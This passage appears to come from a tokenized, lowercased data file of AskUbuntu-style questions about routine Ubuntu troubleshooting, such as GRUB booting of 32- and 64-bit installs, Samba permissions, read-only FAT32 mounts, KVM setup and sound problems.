//us.archive.ubuntu.com/ubuntu/dists/natty-updates/multiverse/i18n/translation-en_us something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-updates/multiverse/i18n/translation-en something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-updates/restricted/i18n/translation-en_us something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-updates/restricted/i18n/translation-en something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-updates/universe/i18n/translation-en_us something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-updates/universe/i18n/translation-en something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) e : some index files failed to download . they have been ignored , or old ones used instead . follow up : box was used in usa , and came to europe $ cat /etc/resolv.conf # generated by networkmanager empty ... . $ vim /etc/resolv.conf # generated by networkmanager domain telenet.be search telenet.be nameserver 195.130.130.129 nameserver 195.130.131.129 works $ http : //www.graphviz.org/content/command-line-invocation $ dot -tpng -o < outputfile.path > < inputfile.path >
97555	is it possible to deploy a ubuntu cloud in an esx-server	i wondered whether it is possible to set up a ubuntu enterprise cloud for testing purposes inside a vm-ware infrastructure . i know that the cloud controller is able to run inside a vmware , but i did n't find information regarding the node controller .
97558	how to install ubuntu from a usb key using syslinux ?	i 'm making a bootable usb key for myself , and one function of it is to install ubuntu . i have downloaded the ubuntu-11.10-desktop-i386.iso file . there is a pretty good method for installation of red hat from a usb drive , but the problem is , when it comes to ubuntu , what the syslinux.cfg file should be ? i used syslinux -d /boot/syslinux /dev/sdb1 and put vmlinuz and initrd.img inside it . is the following item of syslinux.cfg correct ? label installubuntu menu label ubuntu 11.10 install kernel /boot/syslinux/vmlinuz append linux load_ramdisk=1 initrd=/boot/syslinux/initrd.img method=hd : sdb1 : /
97559	can ubuntu be installed on a usb 3.0 , not talking about live usb , i want to install it on usb itself ?	can ubuntu be installed on a usb 3.0 , not talking about live usb , i want to install it ? i was thinking about buying a 16/32 gb usb 3.0 pendrive and install ubuntu on it . i am sure that ubuntu could be installed on a usb 2.0 stick , but not sure if you can really install ubuntu on usb 3.0. wanted to make sure before buying usb 3.0 . tia kalpav
97560	adding archlinux to dualboot without messing up grub	right now i have a dual boot setup with windows 7 and ubuntu 10.10 , both 64 bit . i would like to try archlinux , but i 'm afraid it will mess up my grub bootloader , so that i ca n't get into ubuntu or windows anymore . if i install archlinux on a new partition , and then use the ubuntu-livecd , can i just run update-grub to fix everything ? if not , what do i need to do to keep my current setup and add archlinux ? thanks in advance ! update it worked out ! just install archlinux on a new partition , if it asks for a bootloader , skip it . then the grub menu stays the same , so you can log into ubuntu and run update-grub .
97561	brightness setting is reset to maximum at login	my laptop 's screen brightness is auto set to maximum at login ( = at the login screen already ) . even after i have adjusted it to lower it is again set to maximum after annother login . is there a way to save the previous brightness settings in ubuntu 12.04 ? additional info by gentmatt : this definitely seems to be related to the used graphics . when using the discrete graphics , the brightness is set to maximum on every boot . when using the integrated graphics , the brightness setting which mac os x has set is used . but ubuntu does not change that setting . it uses the stored setting by os x . therefore , the brightness at login is only changed , when os x changes the brightness .
97568	how to install matlab	i have ubuntu 11.10 and try to install matlab 2011a . i followed the instructions on the pdf manual accompanying matlab as well as the topic at https : //help.ubuntu.com/community/matlab . the problem is when i run sudo /matlab_install_root/install i get the message sudo : /matlab_install_root/install : command not found is that an issue of incompatibility ? cheers ,
97573	no driver for panasonic workio dp-c323 photocopier	i cant seem to find a linux driver for the panasonic workio dp-c323 photocopier . is there a way to port the ppd infor from windows to get it to work ?
97578	time problem causes imap server to fail	i 've had a problem with my system time , when i execute the following : date & & touch test & & stat test i get this result : sun jan 22 17:52:07 msk 2012 file : test size : 0 blocks : 0 io block : 4096 regular empty file device : 1dh/29d inode : 5543372 links : 1 access : ( 0644/-rw-r -- r -- ) uid : ( 0/ root ) gid : ( 0/ root ) access : 2012-01-22 17:19:39.000000000 +0400 modify : 2012-01-22 17:19:39.000000000 +0400 change : 2012-01-22 17:19:39.000000000 +0400 this causes my imap server to give me an error upon login , namely* bye clock skew detected . check the clock on the file server i tried to solve this using ntpdate and ntpd daemon , but though neither give me an error , the situation does not change . i tried ubuntu forums but nobody seems to know what to do . i would appreciate any help i could get .
97588	convert entire file system to utf-8	i have a volume in afs format , in which the encodings are quite messed up . ascii , latin-1 , iso-8859-1 and utf-8 all co-exist and it is more or less arbitrary which format is used . some files are saved in one encoding , and other files in the same directory are in another , etc ... is there any clean way in which i can convert the entire tree , starting at a specified root folder and walking recursively , to utf-8 ? the tree is very large , making a manual inspect-and-act solution impossible ; i have to do this with a recursive scripting solution . i 'm connecting to the file system over ssh , if that matters .
97589	synctoy like application	any synctoy like software that supports scheduling and multiple folders selection ? i need to synchronize one folder which consists of subfolders from multiple locations . also changes should be 2 way , meaning file deleted from one location should be deleted in other and should not follow source and destination analogy of rsync .
97592	`` deb '' packages recovery	the main point is to make `` deb '' packages recovery . as i 'm using ubuntu , i install it several times for friends so i decided to make packages recovery , so i tried `` aptoncd '' to do but i ca n't find a choice to restore from iso file in the program just accept cd ! i tried to burn it on cd also nothing happened as assuming no cd in driver ! ! , i tried to copy the packages manually then when installing any program ca n't be completed and an error occur additional problem : now on my laptop every time i try to install any program it ask for packages cd even if i enter the cd it ca n't install any package ! so no more program for me !
97598	custom action to set emblem in thunar	i 'm on xubuntu 11.10 and currently trying to use emblems in thunar to mark which videos in a folder i 've already watched . the problem is i ca n't find any terminal command to do so and neither can i change the properties of multiple files in thunar as the context menu item 'properties ' is greyed out as soon as i select more than one file . the command 'gvfs-set-attribute ' which works with nautilus does n't do anything in thunar . i guess thunar stores the meta-data in some other way . can anyone tell me how to either set the emblems with a custom command ( better solution ) or change multiple file properties in thunar ?
97599	access wiki installation on host from virtual server	recently i set up a dokuwiki installation on ubuntu server in virtualbox . my host os is ubuntu 11.10 . till date i was using nat configuration for my virtualbox . since today i decided to use host-only networking as i did not want the wiki access to outside world . when i was using the nat method i could access my wiki with this url : http : //localhost:8080/dokuwiki/doku.php . however after i switched to host-only way i am not able to do it . after seeing instructions elsewhere i realized that using http : //192.168.56.101/dokuwiki/doku.php helps but it did not help me . as instructed here , how can i access apache ( on virtualbox guest ) from host ? i tried adding following line to my hosts file 192.168.56.101 userver with the idea of using http : //userver/dokuwiki/doku.php to access my site . even http : //192.168.56.101/dokuwiki/doku.php did not work . so can anyone help me on how can i go about this ? accessing with ip address in the url would be ok , but i would like to know how i can set custom domain name for use . update : as suggested by r.k . i restarted both virtual and physical machines . then i observed that before connecting to internet the wiki is accessible with http : //192.168.56.101/dokuwiki/doku.php or http : //userver/dokuwiki/doku.php . once i connect to the web using my usb dongle ( i use wvdial ) the wiki becomes inaccessible .
97603	speakers continue to play even after i plug in headphones on a satellite l640	im using ubuntu 11.04 and window 7 in toshiba satellite l640 . normal jack headphone is working in windows 7 but it is not working in ubuntu 11.04. sound keeps coming out onboard speakers while plug in headphone . analogue headphones option is not at `` sound settings '' the `` output '' tab
97611	why is 32-bit ubuntu folder size much larger than 64-bit version ?	i noticed this when sync'ing a folder with hundreds of thousands of sub folders from my local 32-bit ubuntu ( 10.04 , ext3 ) to my remote 64-bit ( 10.04 ext3 ) vps . the size of the local directory is hundreds of m 's larger than that of the remote server . it turns out that the difference is caused by the different sizes of the folders -- $ uname -a linux < > 2.6.39.1-x86_64- < > # 1 smp tue jun 21 10:04:20 edt 2011 x86_64 gnu/linux $ ls -ld electronics/ drwxr-xr-x 12 jerry jerry 4096 2012-01-22 06:13 electronics/ $ uname -a linux < > 2.6.32-37-generic # 81-ubuntu smp fri dec 2 20:35:14 utc 2011 i686 gnu/linux $ ls -ld electronics/ drwxr-xr-x 12 jerry jerry 12288 2012-01-22 14:13 electronics/ the question is : why are the folder sizes different ? and when i install a new ubuntu , how to make them as small as possible ?
97616	ca n't install wxmaxima on ubuntu 11.10	when trying to install the wxmaxima app from the ubuntu software center i am getting this error : failed to fetch http : //pt.archive.ubuntu.com/ubuntu/pool/universe/g/gmp4/libgmp3c2_4.3.2+dfsg-2ubuntu1_i386.deb 403 forbidden i suppose that for some reason the file is n't availabe in the .pt server . is there anyway to try with a different one ? thanks .
97620	grub splash screen on boot	i want to enable the nice splash screen on grub boot menu . i have ubuntu 11.04 , running on a nvidia graphics card . please help . i 'm new to linux . edit i want to set a background image when grub shows a list of available os . i have ubuntu 11.04 . i 've changed colour through grub.cfg in /boot/grub but ca n't set an image as background in the list .
97621	which group do i need to add a user to to give them access to editing network connections ?	i 'd specifically like them to be able to use the network manager .
97625	change various interface colors	the default theme is ok for me , would just like to tune some colors , i.e . usually input field background color across all applications . this was easily discoverable for me in e.g . 11.04 or earlier ; where is that option in 11.10 ? i found some existing answers using some external tools , etc . is that really the only solution , did canonical remove the way to adjust basic theme settings for user ? thanks
97626	how to install googletest ?	i searched for googletests using muon , but it looks like ubuntu does n't have packages for it . do i need to install using sources ?
97630	tizen linux is for mobile & ipad - will this work with ubuntu packages ?	i am compiling the tizen linux for mobile and ipad . but inside tizen can we deploy or use the repository from ubuntu ? because i have many application working under ubuntu ( but ubuntu do not have mobile compatible hardwares or etc and also not have any ipad modules ) , how can we port ubuntu packages to tizen ? screenshot :
97639	hindi font problem in chrome	i am using google chrome . i am facing problem in using hindi news . which shows bullets instead of proper hindi text . but this same thing is not happening with firefox it shows hindi font . when i use https : //wiki.ubuntu.com/fonts this in firefox fonts in firefox fonts in chrome i used this site for solving this problem its tell me to modify .fonts.conf file i 'm currently working on font settings in xml ( .fonts.conf ) . i noticed that after installing msttcorefonts things do n't look quite as good in firefox anymore . most web pages request arial which does n't get hinted and anti-aliased too nicely , especially on lcd screens . i personally prefer the `` sharp '' non-anti-aliased look . i hate the new look which comes from this conf . i 'm using ubuntu 11.10 32bit . the font i am using in this version of ubuntu are the latest . or i have to update my fonts . is there any new font look in ubuntu
97641	have grub2 boot 32 and 64 bit ubuntu	i just installed a system like this : ubuntu @ ubuntu : ~ $ ls -l /dev/disk/by-label/ total 0 lrwxrwxrwx 1 root root 10 2012-01-22 18:49 boot - > ../../sda1 lrwxrwxrwx 1 root root 10 2012-01-22 18:49 ubuntu32 - > ../../sda2 lrwxrwxrwx 1 root root 10 2012-01-22 18:28 ubuntu64 - > ../../sda3 lrwxrwxrwx 1 root root 10 2012-01-22 18:49 home - > ../../sda5 ubuntu @ ubuntu : ~ $ ls -l /dev/disk/by-uuid/ total 0 lrwxrwxrwx 1 root root 10 2012-01-22 20:55 3582d70f-f4a5-484c-b14c-45cd740346b9 - > ../../sda1 lrwxrwxrwx 1 root root 10 2012-01-22 20:55 741182a8-3f15-4dfd-994d-654c8a57a9e4 - > ../../sda2 lrwxrwxrwx 1 root root 10 2012-01-22 20:55 1c415472-a770-4d76-be9f-27b8c1408e2a - > ../../sda3 lrwxrwxrwx 1 root root 10 2012-01-22 20:55 3515d523-72a2-4e04-b7da-cb6a1fd572ef - > ../../sda5 lrwxrwxrwx 1 root root 10 2012-01-22 20:55 f1f1cd7e-30cb-44e7-9ef6-986a589e0045 - > ../../sda6 i need 32 and 64 bit separate so i can test driver performance on each , the home directory is shared and each version of ubuntu is mounted as /ubuntuxx under the other version . /boot also points to /dev/sda1 on both . when i run sudo update-grub from ubuntu32 it runs fine but i get an error booting ubuntu64 . init fails and i 'm assuming it is because of the wrong bit type . should n't grub 's os probe be bit-aware ? how can i get these two to boot properly . i ran grub-customizer from a live disk , chose /dev/sda3 as root , selected all partitions in the second step , and then removed all entires except for os-prober and memtest . what resulted is the attached grub.cfg . it now lists /dev/sda2 as the only os option . the grub.cfg has the root uuid set to /boot for every entry . grub.cfg : http : //pastebin.com/dkdxian4 fstab ( both ) : http : //pastebin.com/3suabyry i know grub2 is all auto-generated and menus and jazz , but how do i just nuke all that and manually add entires ( i 'm not keeping this install long so there 's no worry about kernel updates ) i took a shot at bilndly replicating the /dev/sda2 entry but adjusting it for /dev/sda3 however it did n't go well . i did however , manage to get the same error as my first attempt ( it 's the line right before the kernel panic , run-init ) updated part of grub.cfg : http : //pastebin.com/dvfbhrbf ( null ) begin : running /scripts/local-bottom ... done . done . begin : running /scripts/init-bottom : ... done . [ 3.402989 ] request_module : runaway loop modprobe binfmt-464c run-init : /sbin/init : exec format error [ 3.406303 ] kernel panic - not syncing : attempted to kill init ! [ 3.406394 ] pid : 1 , comm : run-init not tainted 3.0.0-15-generic # 25-ubuntu [ 3.408290 ] [ < c151a922 > ] ? printk+0x2d/0x2f [ 3.408338 ] [ < c151a800 > ] panic+0x5c/0x151 [ 3.408388 ] [ < c104b564 > ] forget_original_parent+0x1e4/0x1f0 [ 3.408440 ] [ < c10d3a48 > ] ? perf_cgroup_attach_task+0x20/0x20 [ 3.408489 ] [ < c104b583 > ] exit_notify+0x13/0x140 [ 3.408536 ] [ < c104bd8d > ] do_exit+0x1ad/0x3a8 [ 3.408585 ] [ < c1313850 > ] ? tty_write+0x228/0x228 [ 3.408632 ] [ < c104c098 > ] sys_exit+0x18/0x28 [ 3.408680 ] [ < c152e424 > ] syscall_call+0x7/0xb i 'm beginning to think it has to do with the kernel images that are in the /boot directory . ok , now i 'm certain that it is due to the fact that one partition is 32-bit and one is 64-bit . figure 1 : exert from /boot/grub/grub.cfg : linux /vmlinuz-3.0.0-12-generic root=/dev/sda2 initrd /initrd.img-3.0.0-12-generic figure 2 : listings of /ubuntu64/vm* and /ubuntu32/vm* me @ gamma : ~ $ ls -l /vm* lrwxrwxrwx 1 root root 29 2012-01-23 20:41 /vmlinuz - > boot/vmlinuz-3.0.0-15-generic lrwxrwxrwx 1 root root 29 2012-01-22 13:05 /vmlinuz.old - > boot/vmlinuz-3.0.0-12-generic me @ gamma : ~ $ ls -l /ubuntu32/vm* lrwxrwxrwx 1 root root 29 2012-01-22 12:41 /ubuntu32/vmlinuz - > boot/vmlinuz-3.0.0-15-generic lrwxrwxrwx 1 root root 29 2012-01-22 12:22 /ubuntu32/vmlinuz.old - > boot/vmlinuz-3.0.0-12-generic figure 3 : magic file type of /boot/vmlinuz-3.0.0-12-generic /boot/vmlinuz-3.0.0-12-generic : linux kernel x86 boot executable bzimage , version 3.0.0-12-generic ( buildd @ creste , ro-rootfs , root_dev 0x801 , swap_dev 0x4 , normal vga /boot/vmlinuz-3.0.0-15-generic : linux kernel x86 boot executable bzimage , version 3.0.0-15-generic ( buildd @ creste , ro-rootfs , root_dev 0x801 , swap_dev 0x4 , normal vga now here 's the real kicker : me @ gamma : ~ $ sudo find / -name `` vmlinuz* '' /boot/vmlinuz-3.0.0-12-generic /boot/vmlinuz-3.0.0-15-generic /vmlinuz.old /vmlinuz /ubuntu32/vmlinuz.old /ubuntu32/vmlinuz that 's the only kernel on my system ! how is that even possible ? i 'm running 64-bit right now ( /dev/sda3 is / and uname reports 64-bit ) ! i checked the package contents on packages.ubuntu.com and the am64 version of linux-image-3.0.0.15-generic lists /boot/vmlinuz-3.0.0-15-generic as a file , so i ran the following : me @ gamma : ~ $ sudo openssl dgst -md5 /boot/vmlinuz-3.0.0-15-generic > ~/3.0.0.15x86 me @ gamma : ~ $ sudo apt-get install -- reinstall linux-image-3.0.0-15-generic ( output omitted ) me @ gamma : ~ $ sudo openssl dgst -md5 /boot/vmlinuz-3.0.0-15-generic md5 ( /boot/vmlinuz-3.0.0-15-generic ) = f56839a4642eb97e06e5efb0bc74f4dc me @ gamma : ~ $ cat ~/3.0.0.15x86 md5 ( /boot/vmlinuz-3.0.0-15-generic ) = f56839a4642eb97e06e5efb0bc74f4dc me @ gamma : ~ $ sudo openssl dgst -md5 /boot/vmlinuz-3.0.0-15-generic > ~/3.0.0.15x86 so the linux kernel acts very much like the mach kernel in osx in that it is a 32-bit executable that switch to 64-bit mode when needed . the question then is why am i getting an error about `` exec format error '' ? this post however seems to indicate that the runaway loop modprobe from the kernel panic indicates that this is indeed a 32/64 bit issue . grub must have some way of telling the kernel the bitlength , maybe it is in an associated file in /boot , looking into that tomorrow . quick update : the 32-bit and 64-bit kernels hash differently , but file reports them both to be x86 . < md5 ( /boot/vmlinuz-3.0.0-15-generic ) = f56839a4642eb97e06e5efb0bc74f4dc -- - > md5 ( /boot/vmlinuz-3.0.0-15-generic ) = cee6cd7db9016ee8531be92504ac802b so i need to determine how to install the kernel to somewhere other than /boot so that the two kernels do n't clobber each other ...
97642	ubuntu command line system with lxde	when installing a standard ubuntu 10.04 system on my system , i have to use i915.modeset=0 xforcevesa when beginning the installation . i tried doing the same for a command line installation so i could have a base system and install lxde later , it does n't work , i.e . if i do n't use i915.modeset=0 xforcevesa , after booting , it just shows a blank screen . i get the same with a command line system plus lxde , i.e . a blank screen . so my question is , where do i have to enter i915.modeset=0 xforcevesa after installing a command line install plus lxde ?
97645	banshee does n't play songs	i am a new ubuntu user as of this morning . i put a few songs into banshee to test it out . initially it did n't work , but after a reboot , it played music until i closed the app . some time later i tried it again , and this time it does n't play anything . have been trying it a while now . as far as i can tell the songs are there . they were donloaded to the hardrive and worked once today for a brief time . i do n't know what the `` package for the mp3 installed ( ubuntu-restricted-extras ) . '' sorry - i am a bit of a novice . spent my computing life being coddled by mac . any suggestions ?
97646	is it possible to run windows 8 apps in ubuntu ?	i read that new apps in windows 8 will mainly be developed in html5 and java-script . those two languages are already supported in ubuntu . hence , is it − or will it be − possible to run those apps in ubuntu ? how do i do that ? could you give me a practical example ? or will it just be easier for developers to port their application to our platform ? so will i have to wait for them to do the job ?
97651	how can i get the boot process to complete ?	update think this may be because i have some problem booting off lvm - still in need of any help anyone could offer - even just a pointer or two as to where to look would be greatly appreciated . one of my 11.10 machines will not boot - and i am at a loss as to why and what to do about it : i am not even sure if it is a software or hardware problem . the machine does not crash and remains under software control at all times ( eg num lock always works , ctl+alt+del will cause an orderly reboot ) but the boot does not complete : i get to `` /scripts/init-bottom ... done '' , few minute wait , then get messages like `` scsi : killing requests for dead queue '' , then a message to say one of my scsi tape drives has been attached then , again after a short wait , some messages about how `` watershed sh -c '/sbin/lvm/vgscan ; /sbin/lvm vgchan vgchange -a -y ' '' has been terminated with signal 9 , then a `` done '' and then nothing - ie the machine just sits there , still under software control but apparently doing nothing . hitting ctrl+alt+del gives a message that alsa-main process and plymouth-upstart-bridge are being halted before an orderly reboot begins . if i use a rescue cd the filesystem seems to be there undamaged . i know this is all a bit vague , but any help at all with this would be very welcome .
97652	external hdd mounted as read only fat32	my ubuntu machine has set my external hdd to read only . the drive is a 2tb that i have configured to fat32 so that almost everything can read/write to it . i know that from using the search box on this site one fix is `` sudo nautilus . '' i went to my hdd in the file manager , right clicked , properties . under permissions i tell it to allow read/write , but it says it is a read only file system ... i know from some googleing that there is a chance in a fix by unmounting the drive , then forcing it to mount . i heard that this causes a loss in data though , and the content on the drive is important ( which is why i just do n't reformat the drive ) . if it helps i just reinstalled ubuntu , so i do n't know if my old profile is the `` owner of the drive '' under the permissions tab because i made it the same user name ... i know that if i go to a windows computer i can tell it to take ownership , where i can then disable read only . is there no way to do this from ubuntu ? gnomes @ gnomes : ~ $ mount /dev/sda1 on / type ext4 ( rw , errors=remount-ro , commit=0 ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) fusectl on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfs-fuse-daemon on /home/gnomes/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=gnomes ) /dev/sdb1 on /media/thirsty 2tr_ type vfat ( rw , nosuid , nodev , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , showexec , flush , uhelper=udisks ) /home/gnomes/.private on /home/gnomes type ecryptfs ( ecryptfs_check_dev_ruid , ecryptfs_cipher=aes , ecryptfs_key_bytes=16 , ecryptfs_unlink_sigs , ecryptfs_sig=40584e1d6fa2a33e , ecryptfs_fnek_sig=83ad2a5a52a1069e ) gnomes @ gnomes : ~ $ fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=839b800b-ce92-4d72-ad5b-0e84de7c74be / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation # uuid=e25b3b92-d693-4c93-8e08-2470aa0f5152 none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 i just found this on a possible sister site to this one http : //superuser.com/questions/105769/external-hard-drive-is-read-only-how-to-change-owner-ubuntu i want need to know if this is the solution since my drive is in fat 32 not nfts , and if this will wipe any data on my external edit- the drive is posted its name is `` thirsty 2tr '' i tried sudo mount -o remount , rw '/media/thirsty 2tr ' and it did nothing ... it makes an arrow like ^ but facing right after me messing around i got this , which looks promising , but means nothing to a noob like me gnomes @ gnomes : ~ $ sudo mount -o remount , rw '/media/thirsty 2tr' [ sudo ] password for gnomes : gnomes @ gnomes : ~ $ sudo mount -thirsty 2tr remount , rw '/media/thirsty 2tr' mount : invalid option -- 't' usage : mount -v : print version mount -h : print this help mount : list mounted filesystems mount -l : idem , including volume labels so far the informational part . next the mounting . the command is `mount [ -t fstype ] something somewhere ' . details found in /etc/fstab may be omitted . mount -a [ -t|-o ] ... : mount all stuff from /etc/fstab mount device : mount device at the known place mount directory : mount known device here mount -t type dev dir : ordinary mount command note that one does not really mount a device , one mounts a filesystem ( of the given type ) found on the device . one can also mount an already visible directory tree elsewhere : mount -- bind olddir newdir or move a subtree : mount -- move olddir newdir one can change the type of mount containing the directory dir : mount -- make-shared dir mount -- make-slave dir mount -- make-private dir mount -- make-unbindable dir one can change the type of all the mounts in a mount subtree containing the directory dir : mount -- make-rshared dir mount -- make-rslave dir mount -- make-rprivate dir mount -- make-runbindable dir a device can be given by name , say /dev/hda1 or /dev/cdrom , or by label , using -l label or by uuid , using -u uuid . other options : [ -nffrsvw ] [ -o options ] [ -p passwdfd ] . for many more details , say man 8 mount . gnomes @ gnomes : ~ $ i got this when i tried to do it anouther way gnomes @ gnomes : ~ $ sudo mount -o remount , rw '/dev/sdb1 on /media/thirsty 2tr' [ sudo ] password for gnomes : mount : ca n't find /dev/sdb1 on /media/thirsty 2tr in /etc/fstab or /etc/mtab gnomes @ gnomes : ~ $ i tried this today . gnomes @ gnomes : ~ $ sudo dosfsck -a /dev/thirsty 2tr [ sudo ] password for gnomes : usage : dosfsck [ -aaflrtvvwy ] [ -d path -d ... ] [ -u path -u ... ] device -a automatically repair the file system -a toggle atari file system format -d path drop that file -f salvage unused chains to files -l list path names -n no-op , check non-interactively without changing -p same as -a , for compat with other *fsck -r interactively repair the file system -t test for bad clusters -u path try to undelete that ( non-directory ) file -v verbose mode -v perform a verification pass -w write changes to disk immediately -y same as -a , for compat with other *fsck i try using a suffix , with the command i entered but it just pops up this same list again
97655	error : out of disk message after fresh install of 11.10	after installing 11.10 i get an error : out of disk message followed by grub2 rescue > . this happens on the first restart at the end of the installation . i new to ubuntu so i would very much appreciate some help ... thanks much
97660	how to install kvm in ubuntu 10.04 ?	i am trying to install ubuntu 12.04 on a usb flash disk and found this askubuntu question . however i am stuck at the part of the kvm . i am supposed to type this command at the terminal sudo kvm /dev/sdb -cdrom ~/.cache/testdrive/iso/ubuntu_natty-desktop-i386.iso i tried installing kvm using sudo apt-get install kvm however on running the command to install ubuntu , i get the following message . `open /dev/kvm : no such file or directory could not initialize kvm , will disable kvm support i also get this a qemu terminal starting seabios ( version 0.5.1 ) booting from hard disk ... . boot failed : not a bootable disk boot from floppy ... . boot failed : could not read the boot disk booting from cd-rom ... . 23mb medium detected boot failed : could not read from cdrom ( code 000c ) no bootable device on running the command , egrep -c ' ( vmx|svm ) ' /proc/cpuinfo i get an output 0 . this means that my computer does not support hardware virtualization . computer specs intel core 2 duo 1.83 ghz , 2 gb ram , intel graphics card please help . i 'll update the question as i get more info .
97665	ubuntu one limit concurrent uploads / downloads	i installed ubuntu one indicator , and it shows that several files are being uploaded at once . it seems my network is very sensitive to many open connections , and even when limiting the speed , the amount of connections ubuntu one has made , causes latency spikes . i was wondering if there were a way to limit how many files were being uploaded and downloaded at once .
97666	can you remove printer/ scaner support ?	since my laptop doesnt have a printer hooked up , or a scanner hooked up , and never will since it doesnt work with my printer ( wrong cables ) is there a possibility to remove the process and packages to free up those resources or at least disable them from loading on start up .
97667	what precautions should i take with .debs i find on the internet ?	so i was browsing the web the other day , and i came across a few places that wanted me to download .deb files - and since those are installed by root ( and as such have the `` powers '' and capabilities of root ) , i was n't sure about that .
97669	i cant get samba to set proper permissions on created directories	i have a ubuntu server sharing some folders using samba . when a client creates a new folder or file , the permissions are n't set according to the settings in smb.conf . my current settings for a specific share : [ share ] path = /mnt/share browsable = yes guest ok = no writable = yes read only = no create mask = 0774 directory mask = 0774 write list = netuser when a samba client ( a windows 7 box ) uses the 'netuser ' account to create a file or directory , the permissions become drwxr-sr -- 2 netuser sambashare 4096 2012-01-22 21:14 new folder -rwxrw-r -- 1 netuser sambashare 0 2012-01-22 21:07 new text document.txt the parent directory has the set group id flag , thus the sambashare group owner . the idea is that both samba users and server users belong to the sambashare group , and thus are to be able to edit , delete , and create files and directories . however , since created folders does n't have the write flag for group set , server users cant create new files or folders in those folders without sudo . i have tested adding and removing the directory mask , force directory mode , directory security mode , and the force directory security mode , but the behaviors still remains . newly created files and folders does n't get intended 774 permission , but rather 764 and 754 respectively . what am i missing ? why does n't samba set the correct permissions ?
97672	how do you start a new python program in quickly/gedit ?	i am trying to make an app in quickly , and i have made the windows , one is called test the other is called menu and the test is the start page , and i want to program it so when you click on the button ( button1 ) , it will load menu.ui . here is all the code from testwindow : # -*- mode : python ; coding : utf-8 ; indent-tabs-mode : nil ; tab-width : 4 -*- # # # begin license # this file is in the public domain # # # end license import gettext from gettext import gettext as _ gettext.textdomain ( 'test ' ) import gtk import logging logger = logging.getlogger ( 'test ' ) from test_lib import window from test.abouttestdialog import abouttestdialog from test.preferencestestdialog import preferencestestdialog import os # see test_lib.window.py for more details about how this class works class testwindow ( window ) : __gtype_name__ = `` testwindow '' def finish_initializing ( self , builder ) : # pylint : disable=e1002 `` '' '' set up the main window '' '' '' super ( testwindow , self ) .finish_initializing ( builder ) self.aboutdialog = abouttestdialog self.preferencesdialog = preferencestestdialog # code for other initialization actions should be added here . def on_button1_clicked ( self , widget , data=none ) : print `` loading menu ! '' os.chdir ( r '' /home/user/test/data/ui/ '' ) os.startfile ( `` menu.ui '' ) the last 2 lines are my attempt at trying to make it start the menu.ui . are there any ways to do this ? any help is appreciated ! thanks -drex
97674	need to invoke .sh when php webpage load	i am trying to run a .sh script when loading my mainpage : index.php : < ? php shell_exec ( './alert.sh ' ) ; ? > < script type='text/javascript ' > window.location = `` phpshell.php '' ; < /script > my script alert.sh : # ! /bin/sh echo login : > > log.txt date > > log.txt mpg123 alert.mp3 it is working when manually started from nautilus but nothing happen when connecting to via webserver . i am using ubuntu 11.10 and apache2 . default folder for webserver is /var/www
97676	conky & ubuntu - music visualization ( music bars ) ?	i started playing with conky a few days ago and managed to achieve this : ( note : although i 've written it from scratch , i got inspired by http : //www.flickr.com/photos/42124625 @ n07/3959584793/ , credits to the author for his/her creativity ) as you can see , i have some free space between the digital clock ( `` 21:20 '' ) and the connection statistics . now i 'd love to have what i called `` music bars '' in that space . that is , animated bars that move following the sound currently played by my music player ( which is clementine at the moment ) . i 've already managed to display the current track , artist , year , etc . thanks to some scripts and the qbus command . however , i have to main questions : how would i get the actual music data ( i think it 's called amplitudes ) ? how would i animate that in a fairly smooth way ? i 'm using conky and lua with cairographics , but animation really seems to be something complicated , as i have n't found a way to make lua/cairographics `` repaint '' . this forces me to reduce the update_interval in .conkyrc to achieve something `` close '' to an animation . unfortunately , setting a very small value to update_interval makes conky consume a lot of cpu resources , because it does n't only redraw every ( for example ) 50 milliseconds , but it also recalculates variables and re-executes scripts if necessary . therefore , for the animation , i 'm looking for a way have a smooth animation ( 10 fps would be enough ) without making conky eat up the cpu resources . it would be awesome if anybody could give me some ideas . it does not necessarily have to be in lua , and if there 's a good alternative to conky ( should be something lightweight ) , feel free to let me know ! -- thanks a lot for the ideas and suggestions !
97680	no sound on my toshiba satellite l455d-s5976	no sound on my toshiba satellite l455d-s5976 , running ubuntu 11.10 32bit , ati , ixp ac97 , realtek alc250 rev.2 turned the volume up on all volume settings . turned up the volume in the aslamixer , and still no sound . searched on-line with little help found . computer had sound before loading ubuntu 11.10 32bit .
97683	how can i change the default text editor from gedit to vim ?	how can i change the default text editor from gedit to vim ? when i click on a text file , i want it to open in vim under the terminal instead of gedit .
97691	are there any video editors that support webm ?	are there any video editors for ubuntu that support webm importing ? aka , i have a raw webm file that needs editing .
